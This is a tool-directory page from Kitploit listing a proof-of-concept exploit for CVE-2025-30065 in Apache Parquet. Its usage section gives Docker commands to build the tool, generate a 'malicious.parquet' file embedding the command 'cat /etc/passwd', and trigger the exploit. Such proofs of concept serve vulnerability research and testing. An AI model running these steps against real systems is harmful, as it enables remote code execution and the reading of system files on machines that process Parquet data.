Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-30065-PoC — CVE-2025-30065 PoC | Kitploit
Tools/GitHubGitHub/ron-imperva/cve-2025-30065-poc
Container SecurityPayload GenerationVulnerability AnalysisExploitationBinary Exploitation
GitHubron-imperva/cve-2025-30065-poc

CVE-2025-30065-PoC

CVE-2025-30065 PoC

View Repository
151 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-30065 PoC

Usage

Build the image

root@kitploit:~
docker build -t cve-2025-30065 .

Generate the malicious Parquet

root@kitploit:~
docker run --rm -v $(pwd):/poc/out cve-2025-30065 generate "cat /etc/passwd" ./out/malicious.parquet

Trigger the exploit

root@kitploit:~
docker run --rm -v $(pwd):/poc/out cve-2025-30065 trigger ./out/malicious.parquet
Download Tool